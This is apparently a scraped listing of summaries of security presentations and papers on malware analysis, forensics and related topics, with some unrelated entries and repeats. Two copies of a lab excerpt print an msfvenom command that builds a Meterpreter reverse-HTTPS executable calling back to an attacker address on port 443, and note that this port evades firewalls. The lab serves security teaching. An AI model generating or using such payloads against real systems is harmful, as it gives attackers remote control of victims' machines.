The malware encrypts harvested data using AES-256-CBC encryption with a predictable key based on readings from a Windows memory address containing time information. It collects a wide range of information from infected machines including screenshots, passwords, browser histories and Skype call audio. The malware uses various anti-analysis techniques such as virtualization, anti-debugging checks and process hiding. Analysis of the samples indicates the malware is FinSpy, a commercial spyware tool distributed by Gamma International as part of their FinFisher intrusion software.
The Evolution of the Fileless Click-Fraud Malware Poweliks (Symantec)
Poweliks is a fileless malware that infects computers and displays advertisements to generate revenue for its operators. It has evolved since 2013, starting as the file-based Wowliks and transforming into a registry-based threat known as Poweliks that exists solely in the registry. Poweliks uses novel techniques like registry protection, CLSID hijacking, and a zero-day privilege escalation to compromise computers. It has increased its capabilities over time, adding error reporting and using PowerShell to maintain persistence without requiring files. Poweliks infects computers to silently view ads in hidden browser windows, earning money for each ad shown while also potentially distributing other threats through malicious ads.
Gregor Kopf, Bernhard Brehm. Deniability in Messaging Protocols (Yury Chemerkin)
The document discusses the properties of deniability and secure function evaluation in the Off-the-Record (OTR) messaging protocol and similar cryptographic protocols, examining how OTR provides confidentiality, integrity, authentication, forward secrecy, and strong deniability through frequent rekeying and publishing of old MAC keys between parties.
Finland's Cyber Security Strategy Background Dossier (Yury Chemerkin)
This document provides background information on Finland's Cyber Security Strategy. It discusses the cyber domain and threats, principles of cyber security management, securing vital functions against cyber threats, cyber security regulation, and implementation of the strategy. The cyber domain is increasingly interconnected but also introduces new risks. Cyber attacks can disrupt critical infrastructure and society. Finland aims to increase cyber situation awareness, guarantee cybersecurity of businesses, prevent cybercrime, improve cyber defense capabilities, and foster international cooperation and research.
The summary for 14 March 2013 includes: the amounts traded in the various markets were $5,737 million, a 51.19% increase in fixed income. The MAE indices in pesos and dollars rose slightly, while the sovereign bond index in pesos increased by 0.151%. The foreign exchange market showed a variation of 0.163% in the MAE index in dollars.
An old tree lamented being dry and without fruit, but a little bird helped it rehydrate by bringing water in its beak together with other birds. The tree blossomed again, but later refused to let the birds use its branches, until it was almost cut down, at which point the birds helped it once more by removing its heavy fruit.
The Crisis malware is an advanced malware that infects both Windows and Mac computers. It has the ability to steal browser history, contacts, audio/visual recordings and more. It spreads initially through a signed Java applet and then installs core modules and drivers onto the infected system. Both Windows and Mac versions share similar information stealing and command and control capabilities. The Windows version uniquely targets virtual machines by mounting and infecting VM disk images, and can also steal social media and email account information. The malware authors remain anonymous but the code quality suggests it was intended for espionage or private investigation.
Web metrics like hits, page views, uniques, visits, and conversions are commonly used to measure websites but have limitations. Key terms like hits, page views, uniques, visits, conversions, bounce rate, referrer, entry/exit pages, and organic search are defined to understand how to properly interpret web analytics data and its limitations for measuring audiences and success. Relying solely on technical metrics like IPs and cookies to identify uniques can be unreliable since they don't account for shared networks or disabled cookies.
Yury Chemerkin graduated from the Russian State University for the Humanities in 2010 and is currently a postgraduate student there. He has worked in information security since 2009, researching topics such as mobile security, cloud computing, and the privacy impacts of technologies like facial recognition. Currently, his PhD research focuses on legal issues surrounding cloud security and privacy regulations in Russia and the EU.
Dmitriy Evdokimov. Light and Dark Side of Code Instrumentation (Yury Chemerkin)
This document discusses code instrumentation techniques. It begins by introducing the speaker and defining instrumentation as adding extra code to a program or environment for monitoring or changing program behavior. It then covers various uses of instrumentation including debugging, testing, profiling, and security applications like malware analysis. The document categorizes instrumentation approaches as static, load-time, or dynamic depending on when the instrumentation is applied. It provides examples of instrumentation for different programming languages and environments like Java, .NET, and ActionScript.
This document contains SSL certificates used by APT1, a Chinese cyber espionage group, to encrypt malware communications. It provides 4 self-signed certificates - VIRTUALLYTHERE, IBM, WEBMAIL, and ALPHA - that contain information like issuer, validity period, subject, and public key. Detecting these certificates may indicate an APT1 malware infection.
Frankenstein. Stitching Malware from Benign Binaries (Yury Chemerkin)
This document proposes a new malware propagation system called Frankenstein that stitches together code sequences from benign programs to generate obfuscated malware copies. Frankenstein searches benign programs for "gadgets", which are sequences of instructions that can be combined to perform tasks. It uses these gadgets to synthesize new malware copies by composing gadgets according to a high-level "semantic blueprint", making the copies harder to detect than traditional metamorphic malware. The authors implement a proof-of-concept Frankenstein system and show that mining a few local programs provides enough gadgets to synthesize arbitrary functionality.
The Regulation of Ant Colony Foraging Activity Without Spatial Information (Yury Chemerkin)
This document presents a stochastic model of how harvester ant colonies regulate their foraging activity without using spatial information like pheromone trails. The model shows that the return rate of foragers to the nest can be described as a Poisson process. It then proposes a feedback-based algorithm where the rate of outgoing foragers leaving the nest depends on brief antennal contacts with returning foragers carrying food. The model fits experimental data manipulating the return rate of foragers and reproduces key features of how the colony regulates its foraging in response to changing food availability levels.
The document provides joint doctrine for information operations planning, preparation, execution, and assessment to support joint operations and achieve information superiority, establishes the core capabilities of information operations as electronic warfare, computer network operations, psychological operations, military deception, and operations security, and provides guidance on intelligence support, command relationships, and planning considerations for information operations.
Mario Heiderich. Got Your Nose! How to Steal Your Precious Data Without Using... (Yury Chemerkin)
This document provides a summary of a presentation by Mario Heiderich on scriptless attacks that can steal data from a user's browser without using scripts. The presentation covers several techniques, including using CSS to expose passwords, SVG images to log keystrokes in Firefox, and exploiting browser features like scrollbars to brute force CSRF tokens. It demonstrates attacks against login forms, password managers, and email clients. While difficult to defend against due to their use of legitimate browser features, the presenter suggests using a script blocker like NoScript can help protect against these types of scriptless attacks. The document outlines future areas of research around these attacks on mobile devices and applications.
This document introduces the Sulley fuzzing framework. It begins with background information on past fuzzing tools and their limitations. It then discusses Sulley's architecture, including its component breakdown and advanced features. Next, it covers usage and demos of Sulley through audits of Hewlett-Packard and Trend Micro software. Finally, it briefly mentions future development plans for Sulley.
The document discusses how data can be hidden in the service areas of hard drives, which are reserved areas used by hard drive vendors that are inaccessible to the operating system. A proof of concept tool is presented that demonstrates writing a file to these service areas, sanitizing the entire drive with zeros, and then still being able to read the file from the service areas, showing that data hidden there would not be removed by standard sanitization methods.
Cyber Defense Forensic Analyst - Real World Hands-on Examples (Sandeep Kumar Seeram)
The document discusses analyzing malware using static and dynamic analysis techniques. Static analysis involves examining a malware file's code and structure without executing it, using tools like disassemblers and string extractors. Dynamic analysis executes malware in a controlled environment to observe its behaviors and any changes it makes. The document then demonstrates analyzing the "Netflix Account Generator" malware using an isolated cloud sandbox, where it is observed starting child processes and making outbound network connections, suggesting it is a remote access trojan.
SANS Digital Forensics and Incident Response Poster 2012 (Rian Yulian)
This document outlines a 13-step process for analyzing a system for signs of malware infection. The steps include: reducing evidence files, performing antivirus checks, searching for indicators of compromise, automated and manual memory analysis, checking for persistence mechanisms, entropy/packing analysis, reviewing event logs, timeline analysis, third-party hash lookups, and analyzing MFT and file time anomalies. The goal is to methodically narrow down thousands of files to the few most likely to be malware through successive rounds of filtering and examination.
This document discusses various tools and techniques for performing basic dynamic malware analysis, including sandboxes, Process Monitor, Process Explorer, and Regshot. It explains how sandboxes like GFI Sandbox can provide initial analysis of malware but have limitations. Process Monitor and Process Explorer allow monitoring processes, registry changes, and other activity in real-time. Regshot facilitates comparing registry snapshots before and after malware is run.
The document analyzes the Ilomo/Clampi botnet through reverse engineering its malware. It finds that Ilomo uses an obfuscator called VMProtect to hide its functionality. Ilomo spreads through exploiting the Windows registry and uses an unusual method of injecting code into Internet Explorer processes to map its executable into memory. Its goal is information theft, stealing passwords and monitoring web traffic. The document provides a technical breakdown of Ilomo's behavior and components.
Lab-10 Malware Creation and Denial of Service (DoS) In t.docx (pauline234567)
Lab-10: Malware Creation and Denial of Service (DoS)
In this lab, you will create malware by using the Metasploit Framework. You will also launch a Denial of Service (DoS) attack.
Section-1: Create a Malware
Hackers usually create malicious files for different purposes, such as command and control, defense evasion, and persistence. Pentesters create malicious files for ethical purposes, such as performing tests to check the strength of the existing countermeasures. In this lab, you will create a malicious file, and you will explore the strategies to evade the antivirus systems.
Method-1: Create a malicious file by using msfvenom
1) Log in to Kali VM on your personal computer (as set up in Lab 1).
2) Open a terminal window by clicking the terminal icon on the taskbar.
3) Type the following command in the terminal window and press Enter:
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_https LHOST=10.10.10.10 LPORT=443 -f exe -o ethical.exe
You can copy this command and paste it into the terminal window of the Kali VM.
4) After running this command, a file named ethical.exe will be created.
Notes:
msfvenom is a command-line tool within the Metasploit Framework. It is used to generate payloads, such as shellcode and reverse-shell executables. The following page lists the different kinds of payloads that can be generated with msfvenom; have a look at the headings:
https://burmat.gitbook.io/security/hacking/msfvenom-cheetsheet. If you want to learn more about msfvenom, refer to
https://www.offensive-security.com/metasploit-unleashed/msfvenom/
LHOST (Local Host): Specifies the attacker's IP address. When the victim runs this executable, it will establish a connection to that IP address. The IP address is 10.10.10.10. It is a randomly selected IP, and you will not connect to that IP in this lab.
LPORT (Local Port): Specifies the port on which the attacker machine (10.10.10.10) will listen for incoming connections from the victim machine. In this example, when the victim runs the executable, the victim's computer will create a connection to port 443 on the attacker machine (10.10.10.10). Once the victim has connected to the attacker machine, the attacker can start performing malicious activities, including controlling the victim machine, accessing sensitive information, deleting files, etc.
Port 443 is the safest choice for attackers because it is one of the ports that is rarely blocked by firewalls and routers on the Internet and on LANs (Local Area Networks): it is the default port for TLS traffic (mostly encrypted web traffic). Defenders should therefore not treat outbound 443 traffic as trusted by default; TLS inspection or, at minimum, monitoring of destination hosts is needed to spot such connections.
msfvenom uses the reverse_https payload to create the malicious file. Once the victim launches the file, it opens a reverse HTTPS connection from the victim's computer back to the attacker's computer.
The other parameters of msfvenom are relatively more straightforward. x86 specifies t.
This document provides an overview of reversing and malware analysis training. It discusses the purpose of malware analysis, different analysis techniques including static analysis, dynamic analysis and memory analysis. It provides examples of tools used for each technique like strings, PEview, and Volatility. The document demonstrates these concepts on a Zeus bot sample, showing its network activity, process and registry behavior through monitoring tools. Memory analysis with Volatility reveals hidden processes and network connections. The training aims to understand a malware's behavior and interaction with the system.
The document discusses using Netcat, an open-source networking utility, for old school pentesting techniques across the different phases of hacking including reconnaissance, scanning, gaining access, and maintaining access. It mentions how Netcat can be used to create a simple chat client and how the author has used Netcat in many ways for various pentesting functions from information gathering to maintaining a foothold on a target system. The document suggests readers may be familiar with Netcat from security courses or certifications where it is commonly used during the different phases of a penetration test.
Classification of Malware Based on Data Mining Approach (ijsrd.com)
This document discusses a system called the Intelligent Malware Detection System (IMDS) that uses data mining techniques to classify malware. The IMDS uses a PE parser to extract API execution sequences from Windows portable executable files. It then applies an OOA mining algorithm called OOA_Fast_FP-Growth to generate association rules from the API sequences to classify files as malware or benign. Experimental results showed the IMDS outperformed other classification techniques and anti-virus software in detecting malware.
This document discusses vulnerabilities in antivirus software. It begins by noting that over 165 vulnerabilities have been reported in antivirus software in the past 4 years according to the US National Vulnerability Database. It then examines why antivirus software is a target for attackers, including that users have blind faith in it and its error-prone nature in processing many file formats. The document outlines techniques used to find vulnerabilities, including source code audits, reverse engineering, and fuzzing. It also looks at exploiting found vulnerabilities, such as through weak permissions. The overall aim is to raise awareness of security issues in antivirus products.
Reversing & Malware Analysis Training Part 9: Advanced Malware Analysis (Abdulrahman Bassam)
The document discusses a training program on reverse engineering and malware analysis. It provides an overview of static analysis, dynamic analysis and memory analysis techniques. It also includes a demonstration of analyzing a Zeus bot sample using these techniques. The demonstration shows taking the cryptographic hash, determining imports, submitting to VirusTotal, monitoring process, registry and network activity while executing in a sandbox, analyzing the memory dump with Volatility and more.
A zero-day (also known as 0-day) vulnerability is a computer-software vulnerability that is unknown to those who would be interested in mitigating the vulnerability.
Malicious PDF Document Detection Based on Feature Extraction and Entropy (ijsptm)
In this paper we present a machine learning based approach for the detection of malicious PDF documents. We identify various features in PDF documents that are used by malware authors to construct a malicious file. Based on this feature set we derive models that are used to detect malicious PDF documents. With these feature sets, the detection rate is high compared to approaches that depend on analysis of the JavaScript embedded in the PDF document.
Understanding Malware Lateral Spread Used in High Value Attacks (Cyphort)
APTs are known to use advanced Techniques, Tactics, and Procedures (TTP), including advanced malware design with protection layers, sandboxing evasion, and lateral movement inside penetrated networks to seek out high value targets. In this webinar, Nick Bilogorskiy of Cyphort Labs will review various lateral movement techniques and methods used by advanced threats in the past. He will look at some APT samples, e.g. Shamoon, in detail to show the specific steps in the lateral movement by the malware. Understanding the lateral movement of APT should help security defenders to better select and implement protection solutions.
Yury Chemerkin graduated from the Russian State University for the Humanities in 2010 and is currently a postgraduate student there. He has worked in information security since 2009, researching topics such as mobile security, cloud computing, and the privacy impacts of technologies like facial recognition. Currently, his PhD research focuses on legal issues surrounding cloud security and privacy regulations in Russia and the EU.
Dmitriy evdokimov. light and dark side of code instrumentationYury Chemerkin
This document discusses code instrumentation techniques. It begins by introducing the speaker and defining instrumentation as adding extra code to a program or environment for monitoring or changing program behavior. It then covers various uses of instrumentation including debugging, testing, profiling, and security applications like malware analysis. The document categorizes instrumentation approaches as static, load-time, or dynamic depending on when the instrumentation is applied. It provides examples of instrumentation for different programming languages and environments like Java, .NET, and ActionScript.
This document contains SSL certificates used by APT1, a Chinese cyber espionage group, to encrypt malware communications. It provides 4 self-signed certificates - VIRTUALLYTHERE, IBM, WEBMAIL, and ALPHA - that contain information like issuer, validity period, subject, and public key. Detecting these certificates may indicate an APT1 malware infection.
Frankenstein. stitching malware from benign binariesYury Chemerkin
This document proposes a new malware propagation system called Frankenstein that stitches together code sequences from benign programs to generate obfuscated malware copies. Frankenstein searches benign programs for "gadgets", which are sequences of instructions that can be combined to perform tasks. It uses these gadgets to synthesize new malware copies by composing gadgets according to a high-level "semantic blueprint", making the copies harder to detect than traditional metamorphic malware. The authors implement a proof-of-concept Frankenstein system and show that mining a few local programs provides enough gadgets to synthesize arbitrary functionality.
The regulation of ant colony foraging activity without spatial informationYury Chemerkin
This document presents a stochastic model of how harvester ant colonies regulate their foraging activity without using spatial information like pheromone trails. The model shows that the return rate of foragers to the nest can be described as a Poisson process. It then proposes a feedback-based algorithm where the rate of outgoing foragers leaving the nest depends on brief antennal contacts with returning foragers carrying food. The model fits experimental data manipulating the return rate of foragers and reproduces key features of how the colony regulates its foraging in response to changing food availability levels.
The document provides joint doctrine for information operations planning, preparation, execution, and assessment to support joint operations and achieve information superiority, establishes the core capabilities of information operations as electronic warfare, computer network operations, psychological operations, military deception, and operations security, and provides guidance on intelligence support, command relationships, and planning considerations for information operations.
Mario heiderich. got your nose! how to steal your precious data without using...Yury Chemerkin
This document provides a summary of a presentation by Mario Heiderich on scriptless attacks that can steal data from a user's browser without using scripts. The presentation covers several techniques, including using CSS to expose passwords, SVG images to log keystrokes in Firefox, and exploiting browser features like scrollbars to brute force CSRF tokens. It demonstrates attacks against login forms, password managers, and email clients. While difficult to defend against due to their use of legitimate browser features, the presenter suggests using a script blocker like NoScript can help protect against these types of scriptless attacks. The document outlines future areas of research around these attacks on mobile devices and applications.
This document introduces the Sulley fuzzing framework. It begins with background information on past fuzzing tools and their limitations. It then discusses Sulley's architecture, including its component breakdown and advanced features. Next, it covers usage and demos of Sulley through audits of Hewlett-Packard and Trend Micro software. Finally, it briefly mentions future development plans for Sulley.
The document discusses how data can be hidden in the service areas of hard drives, which are reserved areas used by hard drive vendors that are inaccessible to the operating system. A proof of concept tool is presented that demonstrates writing a file to these service areas, sanitizing the entire drive with zeros, and then still being able to read the file from the service areas, showing that data hidden there would not be removed by standard sanitization methods.
Cyber Defense Forensic Analyst - Real World Hands-on ExamplesSandeep Kumar Seeram
The document discusses analyzing malware using static and dynamic analysis techniques. Static analysis involves examining a malware file's code and structure without executing it, using tools like disassemblers and string extractors. Dynamic analysis executes malware in a controlled environment to observe its behaviors and any changes it makes. The document then demonstrates analyzing the "Netflix Account Generator" malware using an isolated cloud sandbox, where it is observed starting child processes and making outbound network connections, suggesting it is a remote access trojan.
SANS Digital Forensics and Incident Response Poster 2012Rian Yulian
This document outlines a 13-step process for analyzing a system for signs of malware infection. The steps include: reducing evidence files, performing antivirus checks, searching for indicators of compromise, automated and manual memory analysis, checking for persistence mechanisms, entropy/packing analysis, reviewing event logs, timeline analysis, third-party hash lookups, and analyzing MFT and file time anomalies. The goal is to methodically narrow down thousands of files to the few most likely to be malware through successive rounds of filtering and examination.
This document discusses various tools and techniques for performing basic dynamic malware analysis, including sandboxes, Process Monitor, Process Explorer, and Regshot. It explains how sandboxes like GFI Sandbox can provide initial analysis of malware but have limitations. Process Monitor and Process Explorer allow monitoring processes, registry changes, and other activity in real-time. Regshot facilitates comparing registry snapshots before and after malware is run.
The document analyzes the Ilomo/Clampi botnet through reverse engineering its malware. It finds that Ilomo uses an obfuscator called VMProtect to hide its functionality. Ilomo spreads through exploiting the Windows registry and uses an unusual method of injecting code into Internet Explorer processes to map its executable into memory. Its goal is information theft, stealing passwords and monitoring web traffic. The document provides a technical breakdown of Ilomo's behavior and components.
Lab-10 Malware Creation and Denial of Service (DoS) In t.docxpauline234567
Lab-10: Malware Creation and Denial of Service (DoS)
In this lab, you will create a malware by using the Metasploit Framework. You will also launch as Denial of Service (DoS) attack.Section-1: Create a Malware
Hackers usually create malicious files for different purposes, such as command and control, defense evasion, and persistence. Pentesters create malicious files for ethical purposes, such as performing tests to check the strength of the existing countermeasures. In this lab, you will create a malicious file, and you will explore the strategies to evade the antivirus systems.
Method-1: Create a malicious file by using msfvenom
1) Log in to Kali VM on your personal computer (as set up in Lab 1).
2) Open a terminal window by clicking the terminal icon on the taskbar.
3) Type
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_https LHOST=10.10.10.10 LPORT=443 -f exe -o ethical.exe in terminal window and press enter.
You can copy this command and paste it to the terminal window of the Kali VM.
4) After running this command, a file named
ethical.exe will be created.
Notes:
msfvenom is a command-line tool within the Metasploit Framework. It is used to create payloads such as malicious executables such as shellcodes and reverse shells. This page shows the different kinds of malicious shells that can be made by using msfvenom. Have a look at the headings:
https://burmat.gitbook.io/security/hacking/msfvenom-cheetsheet. If you want to learn more about msfvenom, refer to
https://www.offensive-security.com/metasploit-unleashed/msfvenom/
LHOST (Local Host): Specifies the attacker's IP address. When the victim runs this executable, it will establish a connection to that IP address. The IP address is 10.10.10.10. It is a randomly selected IP, and you will not connect to that IP in this lab.
LPORT (Local Port): Specifies the port on which the attacker machine (10.10.10.10) will listen for incoming connections from the victim machine. In this example, when the victim runs the executable, the victim's computer will create a connection to port 443 on the attacker machine (10.10.10.10). After the victim makes a connection to the attacker machine, the attacker can start performing malicious activities, including controlling the victim machine, accessing sensitive information, deleting files, etc.
Using port 443 for this malicious activity is the safest choice for hackers because it is one of the ports that is not blocked by firewalls and routers on the Internet and on LANs (Local Area Networks). It is the default port for TLS traffic (mostly encrypted web traffic).
Msfvenom uses the reverse_https payload to create the malicious file. Once the victim runs the file, it makes a reverse HTTPS connection from the victim's computer to the attacker's computer.
The other parameters of msfvenom are relatively more straightforward. x86 specifies t.
This document provides an overview of reversing and malware analysis training. It discusses the purpose of malware analysis, different analysis techniques including static analysis, dynamic analysis and memory analysis. It provides examples of tools used for each technique like strings, PEview, and Volatility. The document demonstrates these concepts on a Zeus bot sample, showing its network activity, process and registry behavior through monitoring tools. Memory analysis with Volatility reveals hidden processes and network connections. The training aims to understand a malware's behavior and interaction with the system.
The document discusses using Netcat, an open-source networking utility, for old school pentesting techniques across the different phases of hacking including reconnaissance, scanning, gaining access, and maintaining access. It mentions how Netcat can be used to create a simple chat client and how the author has used Netcat in many ways for various pentesting functions from information gathering to maintaining a foothold on a target system. The document suggests readers may be familiar with Netcat from security courses or certifications where it is commonly used during the different phases of a penetration test.
Classification of Malware based on Data Mining Approach - ijsrd.com
This document discusses a system called the Intelligent Malware Detection System (IMDS) that uses data mining techniques to classify malware. The IMDS uses a PE parser to extract API execution sequences from Windows portable executable files. It then applies an OOA mining algorithm called OOA_Fast_FP-Growth to generate association rules from the API sequences to classify files as malware or benign. Experimental results showed the IMDS outperformed other classification techniques and anti-virus software in detecting malware.
This document discusses vulnerabilities in antivirus software. It begins by noting that over 165 vulnerabilities have been reported in antivirus software in the past 4 years according to the US National Vulnerability Database. It then examines why antivirus software is a target for attackers, including that users have blind faith in it and its error-prone nature in processing many file formats. The document outlines techniques used to find vulnerabilities, including source code audits, reverse engineering, and fuzzing. It also looks at exploiting found vulnerabilities, such as through weak permissions. The overall aim is to raise awareness of security issues in antivirus products.
Reversing & malware analysis training part 9 advanced malware analysis - Abdulrahman Bassam
The document discusses a training program on reverse engineering and malware analysis. It provides an overview of static analysis, dynamic analysis and memory analysis techniques. It also includes a demonstration of analyzing a Zeus bot sample using these techniques. The demonstration shows taking the cryptographic hash, determining imports, submitting to VirusTotal, monitoring process, registry and network activity while executing in a sandbox, analyzing the memory dump with Volatility and more.
A zero-day (also known as 0-day) vulnerability is a computer-software vulnerability that is unknown to those who would be interested in mitigating the vulnerability.
Malicious pdf document detection based on feature extraction and entropy - ijsptm
In this paper we present a machine learning based approach for detecting malicious PDF documents. We identify various features in PDF documents that are used by malware authors to construct a malicious file. Based on this feature set we build models that are used to detect malicious PDF documents. With these feature sets, the detection rate is high compared to approaches that depend on analysis of the JavaScript embedded in the PDF document.
Understanding Malware Lateral Spread Used in High Value Attacks - Cyphort
APTs are known to use advanced Techniques, Tactics, and Procedures (TTP), including advanced malware design with protection layers, sandboxing evasion, and lateral movement inside penetrated networks to seek out high value targets. In this webinar, Nick Bilogorskiy of Cyphort Labs will review various lateral movement techniques and methods used by advanced threats in the past. He will look at some APT samples, e.g. Shamoon, in detail to show the specific steps in the lateral movement by the malware. Understanding the lateral movement of APT should help security defenders to better select and implement protection solutions.
The EternalBlue Exploit: how it works and affects systems - Andrea Bissoli
The purpose of this report is to focus on one particular aspect of the WannaCry malware in order to understand which vulnerability it exploited and how it spread across the internet. The report shows the EternalBlue attack and how it is possible to take control of the PC through the DoublePulsar attack and a Meterpreter session. Then a case study is shown in which a pivoting attack is performed. In the end, simple keyloggers are injected into the attacked machines in order to collect some useful information.
Day by day, we store more and more confidential information on our computers, from site account credentials to our bank accounts. Every day, malware becomes more and more silent; it doesn't want you to be suspicious, it just wants to stay on your device to do something ... that you don't really want.
Ransomware has become a lucrative criminal enterprise, with cyber criminals extorting over $209 million from organizations in just the first three months of 2016 alone. Ransomware works by encrypting files on infected machines and demanding ransom payments in exchange for the decryption key. While early ransomware dated back to 2005, the threat grew significantly in 2015 with over 400,000 infections and $325 million stolen. Ransomware variants now aim to disrupt device usage until payment is made. Organizations can help mitigate the risk of ransomware through practices like regular backups, keeping software updated, limiting user privileges, and restricting unknown applications.
This document provides an analysis of the Etumbot backdoor malware, including its capabilities and the targeted campaigns in which it has been used. Etumbot is delivered via spearphishing emails containing password-protected archive files. It installs persistently and uses decoy documents to distract victims while establishing command and control channels using encrypted HTTP requests. The malware is attributed to a Chinese threat actor group known for espionage against government and industry targets in East Asia.
Lab-12 Social Engineering and Physical Security The firs.docx - pauline234567
This document describes two security labs - a social engineering lab and a physical security lab. In the social engineering lab, students are instructed to find a phishing email in their junk folder and analyze why it is considered spam. The physical security lab simulates a situation where an attacker exploits physical security vulnerabilities to access a company's network and steal password hashes from one of the Windows computers. Students are guided through steps as an attacker to gain remote desktop access to the target computer, export registry files containing password hashes, and use a tool to extract and view the password hashes, including that of the Administrator account.
The document discusses malware analysis techniques including static analysis, dynamic analysis, and memory analysis. Static analysis involves examining a file without executing it to determine things like file type and cryptographic hash. Dynamic analysis involves executing malware in a controlled environment to observe its behavior, such as file system, process, registry, and network activity. Memory analysis examines a computer's RAM to find artifacts and reveal hidden processes, network connections, and registry modifications. The document provides examples of analyzing a Zeus bot sample using these techniques.
Welcome to the next issue of the monthly digest, your one-stop resource for information on the latest developments, analyses and best practices in the ever-evolving field of security. In this issue we have prepared a diverse selection of articles, news and research findings aimed at both professionals and casual enthusiasts. The goal of our digest is to make our content interesting and accessible. Happy reading
(https://boosty.to/chronicles_security + links to the sources inside the document)
Welcome to the next issue of the monthly digest, your one-stop resource for information on the latest developments, analyses and best practices in the ever-evolving field of security. In this issue we have prepared a diverse selection of articles, news and research findings aimed at both professionals and casual enthusiasts. The goal of our digest is to make our content interesting and accessible. Happy reading
(https://boosty.to/irony_security + links to the sources inside the document)
Welcome to the next edition of our Monthly Digest, your one-stop resource for staying informed on the most recent developments, insights, and best practices in the ever-evolving field of security. In this issue, we have curated a diverse collection of articles, news, and research findings tailored to both professionals and casual enthusiasts. Our digest aims to make our content both engaging and accessible. Happy reading
(https://boosty.to/overkill_security + check original source urls inside)
Welcome to the next edition of our Monthly Digest, your one-stop resource for staying informed on the most recent developments, insights, and best practices in the ever-evolving field of security. In this issue, we have curated a diverse collection of articles, news, and research findings tailored to both professionals and casual enthusiasts. Our digest aims to make our content both engaging and accessible. Happy reading
(https://boosty.to/snarky_security + check original source urls inside)
Security Vulnerability Notice SE-2012-01-PUBLIC [Security vulnerabilities in ... - Yury Chemerkin
This document summarizes a security vulnerability (Issue 54) discovered in Java SE Platform related to method handles. It details how the lack of security checks when resolving method handles using certain MethodHandle methods like resolveVirtual can allow access to protected members of arbitrary classes. The vulnerability on its own is not enough to bypass Java security, but combined with another issue (Issue 55) it can be used to achieve a full sandbox bypass. The vendor Oracle was notified but has so far not acknowledged Issue 54 as a vulnerability, claiming the behavior is allowed. The reporting organization disagrees with this assessment.
The document discusses the Red October malware campaign and describes its use of a Java exploit to infiltrate victim networks in early 2012. It notes that the Java exploit (CVE-2011-3544) was delivered via a link to a site hosting the malicious NewsFinder.jar file. If clicked, it would exploit outdated Java versions. The exploit installed a downloader that communicated with the attackers' command and control servers, and could receive and execute additional malware payloads. The document analyzes the encryption routines and network communications used by the Java exploit and downloader.
The document provides network, file, system and email indicators of compromise from the Comment Crew group observed over the past year. It lists domains, IP addresses, filenames and file hashes that may be associated with Comment Crew attacks but could also match legitimate software. Additional verification is needed to confirm an actual compromise.
This document discusses Indicators of Compromise (IOCs) related to APT1, a Chinese cyber espionage group. It provides links to download the IOCs and explains how they can be used with Mandiant tools like Redline and MIR to detect malware. The document also defines IOCs and describes how the included IOCs were developed and may differ from other Mandiant IOCs. It notes that the IOCs focus on detecting known malware families and may not find new variants.
This document contains a list of hexadecimal strings that are identifiers or codes for unknown items or entities. There are over 200 unique hexadecimal strings included ranging in length from 8 to 32 characters each.
This document contains a list of over 300 domain names. Many of the domain names contain misspellings of popular brands and websites like cnn, yahoo, firefox, and microsoft. The domains appear to be related to phishing or spreading malware by posing as legitimate websites or software updates.
Zane lackey. security at scale. web application security in a continuous depl... - Yury Chemerkin
Effective approaches to web application security at scale involve making things safe by default through universal output encoding, detecting risky functionality changes through automated alerts, automating tests to find simple issues, and monitoring metrics to identify attacks and problems off-hours through automated alerts on thresholds.
Windows 8. important considerations for computer forensics and electronic dis... - Yury Chemerkin
Windows 8 stores email communications and contacts locally in a format that presents challenges for attorney review in litigation. The testing revealed that Windows 8 imports emails, contacts, and social media information from connected web accounts. Over 2,000 email files were found locally stored in EML format, but no files were found in common formats like MSG, PST, or MBOX. This local storage of email presents potential issues for efficiently processing the communications for discovery in litigation.
The stuxnet computer worm. harbinger of an emerging warfare capability - Yury Chemerkin
The document summarizes a Congressional Research Service report on the Stuxnet computer worm. It discusses how Stuxnet targeted Iranian nuclear facilities by infecting industrial control systems. It affected systems in several countries and demonstrated that cyber attacks could disrupt critical infrastructure. The report examines questions for Congress about national security, an international treaty on malicious software, and protecting critical infrastructure from cyber threats.
This document is a newsletter from security consulting firm XMCO Partners. It discusses the Stuxnet malware, including analyzing its myths and realities in part one and its technical workings in part two. It also covers the MS10-073 "keyboard layout" vulnerability exploited by Stuxnet, current hacking news, and blogs and software mentioned by the firm. The newsletter is intended to keep clients informed of recent security topics and XMCO's services, which include intrusion testing, security audits, and vulnerability monitoring.
Stuxnet was a sophisticated malware targeting industrial control systems that was attributed to nation-state sponsorship. The document discusses techniques for attributing malware through analysis of exploits, code quality, debug symbols, and automation. Attribution aims to profile adversary capabilities and differentiate between state-sponsored and criminal actors. Analysis of Stuxnet found use of older vulnerabilities, custom payloads, and insider knowledge of target systems, suggesting a high level of technical skill and resources from a nation state.
Introduction of Cybersecurity with OSS at Code Europe 2024 - Hiroshi SHIBATA
I develop the Ruby programming language, RubyGems, and Bundler, which are package managers for Ruby. Today, I will introduce how to enhance the security of your application using open-source software (OSS) examples from Ruby and RubyGems.
The first topic is CVE (Common Vulnerabilities and Exposures). I have published CVEs many times. But what exactly is a CVE? I'll provide a basic understanding of CVEs and explain how to detect and handle vulnerabilities in OSS.
Next, let's discuss package managers. Package managers play a critical role in the OSS ecosystem. I'll explain how to manage library dependencies in your application.
I'll share insights into how the Ruby and RubyGems core team works to keep our ecosystem safe. By the end of this talk, you'll have a better understanding of how to safeguard your code.
TrustArc Webinar - 2024 Global Privacy Survey - TrustArc
How does your privacy program stack up against your peers? What challenges are privacy teams tackling and prioritizing in 2024?
In the fifth annual Global Privacy Benchmarks Survey, we asked over 1,800 global privacy professionals and business executives to share their perspectives on the current state of privacy inside and outside of their organizations. This year’s report focused on emerging areas of importance for privacy and compliance professionals, including considerations and implications of Artificial Intelligence (AI) technologies, building brand trust, and different approaches for achieving higher privacy competence scores.
See how organizational priorities and strategic approaches to data security and privacy are evolving around the globe.
This webinar will review:
- The top 10 privacy insights from the fifth annual Global Privacy Benchmarks Survey
- The top challenges for privacy leaders, practitioners, and organizations in 2024
- Key themes to consider in developing and maintaining your privacy program
How to Interpret Trends in the Kalyan Rajdhani Mix Chart.pdf - Chart Kalyan
A Mix Chart displays historical data of numbers in a graphical or tabular form. The Kalyan Rajdhani Mix Chart specifically shows the results of a sequence of numbers over different periods.
Programming Foundation Models with DSPy - Meetup Slides - Zilliz
Prompting language models is hard, while programming language models is easy. In this talk, I will discuss the state-of-the-art framework DSPy for programming foundation models with its powerful optimizers and runtime constraint system.
Trusted Execution Environment for Decentralized Process Mining - LucaBarbaro3
